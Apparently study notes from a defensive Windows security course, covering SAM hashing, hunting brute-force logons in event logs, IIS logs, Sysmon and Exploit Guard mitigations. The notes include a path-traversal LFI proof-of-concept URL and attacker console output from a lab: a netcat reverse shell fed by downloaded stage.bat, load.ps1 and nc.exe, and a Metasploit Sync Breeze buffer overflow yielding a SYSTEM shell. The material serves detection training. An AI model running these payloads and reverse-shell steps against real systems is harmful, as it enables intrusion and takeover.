The Security Account Manager (SAM) and Windows Authentication
On Windows, hashed passwords are stored in the Security Account Manager (SAM) database. To deter offline SAM database password attacks, Microsoft introduced the SYSKEY feature, which partially encrypts the SAM file. Though it was successful, it has been discontinued since the encryption key length is considered insecure.
SYSKEY was also being used for ransomware scams. Microsoft has since recommended as an alternative to SYSKEY to protect not only the SAM but entire .
Windows NT-based OS', up to and including Windows 2003 store two different password hashes: LAN Manager (LM), which is based on Data Encrypt Standard (DES), and NT LAN Manager (NTLM), which uses MD4 hashing.
LAN Manager is very weak since passwords longer than seven characters are split into two strings and each piece is hashed separately. They are also converted to all upper-case characters before hashing, and does not include salt, making a hash-lookup attack feasible.
Starting in Vista, LM is disabled by default, using NTLM. Unfortunately, NTLM is still not salted.
Authentication occurs by converting a user's password into a hash via Local Security Authority (LSA) and is then compared to the one stored in the system's SAM.
Suspicious Logins
Potentially Suspicious Logon Event during Off-Hours
[192.168.51.11]: PS C:\Users\Administrator> Get-SecurityEvent 4625 "5/6/2021 00:00:00" "5/7/2021 00:00:00"
ProviderName: Microsoft-Windows-Security-Auditing
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
5/6/2021 9:36:49 AM 4625 Information An account failed to log on....
...
5/6/2021 9:36:44 AM 4625 Information An account failed to log on....
Format-List Custom Field with Logon Type for Logon Failure Events
One of the status codes for a logon failure is C000006F: User logon outside authorized hours. Account policy supports the ability to restrict when user accounts can log in to a system. It is important to note that this restriction cannot be applied to Administrator accounts. But such a configuration can reduce the likelihood of compromised user accounts authenticating during off-hours.
Custom Output for querying Logon Failure Events using Get-SecurityEvent
[192.168.51.11]: PS C:\Users\Administrator> Get-SecurityEvent 4625 "5/6/2021 00:00:00" "5/7/2021 00:00:00" | Format-List TimeCreated, @{Label = "Logon Type"; Expression = {$_.properties[10].value}}, @{Label = "Status"; Expression = {'{0:X8}' -f $_.properties[7].value}}, @{Label = "Substatus"; Expression = {'{0:X8}' -f $_.properties[9].value}}, @{Label = "Target User Name"; Expression = {$_.properties[5].value}}, @{Label = "Workstation Name"; Expression = {$_.properties[13].value}}, @{Label = "IP Address"; Expression = {$_.properties[19].value}}
TimeCreated : 5/6/2021 9:36:49 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : attacker01
IP Address : 192.168.51.50
TimeCreated : 5/6/2021 9:36:49 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : ATTACKER01
IP Address : 192.168.51.50
...
TimeCreated : 5/6/2021 9:36:44 AM
Logon Type : 3
Status : C000006D
Substatus : C000006A
Target User Name : Administrator
Workstation Name : ATTACKER01
IP Address : 192.168.51.50
NLA is recommended for enterprise networks that support RDP for remote access. It requires later versions of software, reduces the risk of denial-of-service, and in one case thwarts a means of persistence. For more information, look up the Accessibility Features sub-technique of Event Triggered Execution in the MITRE ATT&CK Framework.
Logon Success after brute force authentication
[192.168.51.11]: PS C:\Users\Administrator\Documents> Get-SecurityEvent 4624 "5/6/2021 09:36:44" "5/6/2021 09:37:44" | Where-Object { $_.properties[18].value -eq "192.168.51.50" }
ProviderName: Microsoft-Windows-Security-Auditing
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/6/2021 9:36:50 AM 4624 Information An account was successfully logged on....
Web Application Attacks
Internet Information Services (IIS)
IIS is Microsoft's built-in web server solution. In addition to web and file transfer protocols, IIS can server .NET scripts and applications.
Logs are saved to C:\inetpub\logs\LogFiles. Each log file begins with u_ex followed by a date formatted as YYMMDD. Example: u_ex210506.log.
Example IIS Log Entry
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-05-06 19:42:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-05-06 19:42:21 192.168.51.11 GET / - 80 - 192.168.51.50 Mozilla/5.0+(X11;+Linux+x86_64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 200 0 0 94
Common W3C fields and their descriptions
s-ip - IP address of the server receiving the web activity
cs-uri-stem - Target file requested from web server
s-port - Server port of the web service (e.g., 80)
c-ip - IP address of the client requesting the web page
Local File Inclusion
Local File Inclusion (LFI) allows an attacker to access arbitrary files on the underlying file system.
Local File Inclusion Proof-of-Concept for Site Import Plugin from Exploit-DB
[PoC]
======================================
...
Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
======================================
In Windows, web applications like WordPress are typically installed within the wwwroot folder. The full path would be C:\inetpub\wwwroot\wordpress\wp-config.php.
Command Injection allows an attacker to insert arbitrary commands that can be executed by the host operating system rather than the application receiving them.
HTTP POST Excerpt from Plainview Activity Monitor command injection
The only suspicious data in this log entry is the time milliseconds elapse while executing the query — 3731. If a baseline of 200-400 milliseconds is expected then that could lead us to look into this further.
Sysmon ProcessCreate event log entries
[192.168.51.11]: PS C:\inetpub\logs\LogFiles\W3SVC1> Get-SysmonEvent $null "05/10/2021 16:02:00" "5/10/2021 16:03:00"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/10/2021 4:02:34 PM 1 Information Process Create:...
5/10/2021 4:02:34 PM 1 Information Process Create:...
5/10/2021 4:02:34 PM 1 Information Process Create:...
Getting Sysmon ProcessCreate events with chain of execution
Running http_netcat.sh to open a netcat listener and set up Simple HTTP Server
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./http_netcat.sh
listening on [any] 4444 ...
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Running plainview_up_exec to download and execute stage.bat and load.ps1
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ python3 plainview_up_exec.py 192.168.51.11 192.168.51.50
Attempting to upload stage.bat using Plainview Activity Monitor...success!
Now running stage.bat. check your netcat listener for a shell!
Web activity from HTTP Server and command prompt from Windows Server 2019
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./http_netcat.sh
listening on [any] 4444 ...
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.51.11 - - [13/May/2021 14:26:17] "GET /stage.bat HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /stage.bat HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /load.ps1 HTTP/1.1" 200 -
192.168.51.11 - - [13/May/2021 14:26:17] "GET /nc.exe HTTP/1.1" 200 -
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\wordpress\wp-admin>
Confirming that stage.bat was deleted
C:\inetpub\wwwroot\wordpress\wp-admin> cd \
cd \
C:\> dir stage.bat /s
dir stage.bat /s
Volume in drive C has no label.
Volume Serial Number is 0A02-CE1B
File Not Found
All Sysmon events for the attack using plainview_up_exec.py
[192.168.51.11]: PS C:\inetpub\logs\LogFiles\W3SVC1> Get-SysmonEvent $null "05/13/2021 14:26:00" "5/13/2021 14:27:00"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:19 PM 3 Information Network connection detected:...
5/13/2021 2:26:18 PM 1 Information Process Create:...
5/13/2021 2:26:18 PM 1 Information Process Create:...
5/13/2021 2:26:18 PM 11 Information File created:...
5/13/2021 2:26:17 PM 11 Information File created:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 11 Information File created:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
5/13/2021 2:26:17 PM 1 Information Process Create:...
Initial ProcessCreate events from the plainview_up_exec.py script
We could also consider FileCreate events in which the TargetFile is in C:\Windows\Temp. Some malware relies on obscurity to remain undetected, but watching this directory may provide clues as to how we can trace an infection back to its origin process.
Secondary FileCreate event from the plainview_up_exec.py script
Executing Sync Breeze buffer overflow with Metasploit Framework via syncbreeze_exp.sh
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.51.50:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[*] Command shell session 1 opened (192.168.51.50:4444 ->
192.168.51.11:49688) at 2021-05-21 14:50:40 -0400
Confirming hostname and current user context
C:\Windows\system32>hostname
hostname
server01
C:\Windows\system32>whoami
whoami
nt authority\system
SyncBreeze is neither a part of IIS nor does it have itw own auditing mechanism for logon attempts. Sysmon however catches events regarding this activity.
Sysmon events created with buffer overflow
[192.168.51.11]: PS C:\Users\Administrator\Documents> Get-SysmonEvent $null "05/21/2021 14:50:34" "05/21/2021 14:50:44"
ProviderName: Microsoft-Windows-Sysmon
TimeCreated Id LevelDisplayName Message
----------- -- ---------------- -------
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:42 PM 3 Information Network connection detected:...
5/21/2021 2:50:40 PM 1 Information Process Create:...
WDEG provides additional auditing and control mechanisms for local malware. It was developed to address the proliferation of file-less malware.
It is an extension of the Microsoft Windows Enhanced Mitigation Expereince Toolkit (EMET). There are four major components:
Attack Surface Reduction (ASR): This can block executable content or network communications from Adobe Reader, VBScript, and JavaScript.
Controller folder access: With this, Windows can prevent applications from writing or making changes to directories specified by policy. The default is to protect C:\Users\<user account>\.
Network protection: This relies on Microsoft's Intelligent Security Graph as a threat intelligence resource for domain/IP reputation. Anything less-than-reputable can be stopped independently of what process or application started it.
Exploit protection: This replaced EMET — it allows enterprises to further configure Windows Defender's behavior for applications and mechanisms not native to Windows. An Administrator must import an XML configuration file to set this up.
Enabling RopCallerCheck for Sync Breeze using Set-ProcessMitigation
After restarting the service, we can test the exploit again to see if the protection stops it
Failed buffer overflow exploitation
kali@attacker01:~/SOC-200/Windows_Server_Side_Attacks$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.1.23:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
The events for these actions are not stored in Windows Security logs, but rather in the Security-Mitigations logs.
Security Mitigation event for Sync Breeze showing exploit being blocked
[192.168.51.11]: PS C:\Users\Administrator>Get-WinEvent -FilterHashTable @{LogName = 'Microsoft-Windows-Security-Mitigations/UserMode'; StartTime = '5/25/2021 13:42:28'; EndTime = '5/25/2021 13:42:30'} | Format-List -Property Id, TimeCreated, LevelDisplayName, Message
Id : 22
TimeCreated : 5/25/2021 1:42:29 PM
LevelDisplayName : Warning
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 3388) was blocked from calling the API
'LoadLibraryA' due to return-oriented programming
(ROP) exploit indications.
Clearing the Process Mitigation configuration for Sync Breeze from Windows Registry
[192.168.51.11]: PS C:\Users\Administrator> Remove-Item -Path 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syncbrs.exe'
Confirm
The item at HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syncbrs.exe has children and the Recurse parameter was not specified. If you continue, all children will be removed with the item. Are you sure you want to continue?
[Y] Yes [A] Yes to All [N] No [L] No to All [?] Help (default is "Y"): y
If we did not delete the registry key and attempted to run Set-ProcessMitigation, we would likely encounter a PowerShell exception: "Destination array was not long enough. Check destIndex and length, and the array's lower bounds."
Enabling RopCallerCheck's Audit-Only mode for Sync Breeze
After restarting the service, we can then test our exploit again to confirm it is only auditing, not stopping.
Successful buffer overflow exploit
kali@attacker01:~$ ./syncbreeze_exp.sh 192.168.51.11 192.168.51.50
Initiating... please wait
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
RHOST => 192.168.51.11
RPORT => 8080
LHOST => 192.168.51.50
[*] Started reverse TCP handler on 192.168.51.50:4444
[*] Automatically detecting target...
[*] Target is 10.0.28
[*] Sending request...
[*] Command shell session 1 opened (192.168.51.50:4444 ->
192.168.51.11:49876) at 2021-05-25 14:23:33 -0400
C:\Windows\system32>whoami
whoami
nt authority\system
Process Mitigation Audit-only events for Sync Breeze Exploitation
[192.168.51.11]: PS C:\Users\Administrator> Get-WinEvent -FilterHashTable @{LogName = 'Microsoft-Windows-Security-Mitigations/UserMode'; StartTime = '5/25/2021 14:23:32'; EndTime = '5/25/2021 14:23:34'} | Format-List -Property Id, TimeCreated, LevelDisplayName, Message
Id : 21
TimeCreated : 5/25/2021 2:23:33 PM
LevelDisplayName : Information
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 6124) would have been blocked from calling the API
'CreateProcessA' due to return-oriented programming (ROP)
exploit indications.
Id : 21
TimeCreated : 5/25/2021 2:23:33 PM
LevelDisplayName : Information
Message : Process 'C:\Program Files (x86)\Sync Breeze Enterprise\bin\syncbrs.exe'
(PID 6124) would have been blocked from calling the API
'LoadLibraryA' due to return-oriented programming (ROP)
exploit indications.
cs-method - from client (e.g., GET)
cs(User-Agent) - string of the client's web browser
cs(Referer) - of previous page that sent user to the target file, if relevant
sc-status - from server (e.g., 200 for found, 404 for missing)
Certutil is just one of several native binaries that can be used to download files to Windows. However, we chose this utility because it is installed on Windows by default, and modern attackers have learned to leverage these tools for interesting purposes in a technique known as (LotL). The security community has compiled a list of these useful Windows binaries in a project titled .
